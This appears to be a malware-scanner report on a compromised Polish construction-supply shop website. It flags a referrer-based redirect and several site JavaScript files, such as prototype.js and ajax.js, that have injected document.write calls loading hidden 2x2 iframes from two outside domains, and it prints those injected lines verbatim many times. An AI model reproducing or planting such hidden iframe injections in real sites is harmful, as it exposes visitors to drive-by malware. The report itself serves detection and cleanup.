Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://sklep-budowlany.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sklep-budowlany.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 15:12:24 GMT Location: http://tomurcukozel.com/ecws.html?h=1060071 Server: Apache/2 Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://sklep-budowlany.com/ | 200 OK Content-Length: 18193 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/js/skrypty.js | 200 OK Content-Length: 2201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function newwin(x,y,win)
{ window.open("",""+win+"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width="+x+",height="+y+""); } function poptastic(url,x,y) { newwindow=window.open(url,'name','height='+y+',width='+x+',toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no'); if (window.focus) {newwindow.focus()} } function close_tab() { var oElement = document.getElementById('m window.clipboardData.setData("Text", b) } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> | ||
http://sklep-budowlany.com/js/dtree.js | 200 OK Content-Length: 13072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Node(id, pid, name, url, title, target, icon, iconOpen, open) { this.id = id; this.pid = pid; this.name = name; this.url = url; this.title = title; this.target = target; this.icon = icon; this.iconOpen = iconOpen; this._io = open || false; this._is = false; this._ls = false; this._hc = false; this._ai = this.length = Math.max(this.length-1,0); return lastElement; } }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/js/ajax.js | 200 OK Content-Length: 5319 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function sack(file) { this.xmlhttp = null; this.resetData = function() { this.method = "POST"; this.queryStringSeparator = "?"; this.argumentSeparator = "&"; this.URLString = ""; this.encodeURIString = true; this.execute = false; this.element = null; this.elementObj = null; this.requestFile = file; this.vars = new Object(); this.responseStatus = new Array(2); self.onCompletion(); } else { self.onError(); } self.URLString = ""; break; } }; this.xmlhttp.send(this.URLString); } } }; this.reset(); this.createAJAX(); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/js/ajax-dynamic-list.js | 200 OK Content-Length: 314 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> | ||
http://sklep-budowlany.com/js/prototype.js | 200 OK Content-Length: 47919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[ element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2468 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') || parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> | ||
http://sklep-budowlany.com/js/lightbox.js | 200 OK Content-Length: 314 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> Hidden iFrame found. size: 2x2 src: http://cpaexamreviewcourses.net/zahs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cpaexamreviewcourses.net/zahs.html> | ||
http://sklep-budowlany.com/?go=kategorie | 200 OK Content-Length: 26258 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=698 | 200 OK Content-Length: 36776 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=704&supplier= | 200 OK Content-Length: 19666 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=716 | 200 OK Content-Length: 26054 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=723&supplier=Kopalnia Julian | 200 OK Content-Length: 14204 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=512 | 200 OK Content-Length: 37472 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> | ||
http://sklep-budowlany.com/?category_id=558&supplier=Cieszynka | 200 OK Content-Length: 15743 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://tomurcukozel.com/ecws.html?i=1060071 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tomurcukozel.com/ecws.html?i=1060071> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sklep-budowlany.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sklep-budowlany.com/
Result: sklep-budowlany.com is not infected or malware details are not published yet.
Result: sklep-budowlany.com is not infected or malware details are not published yet.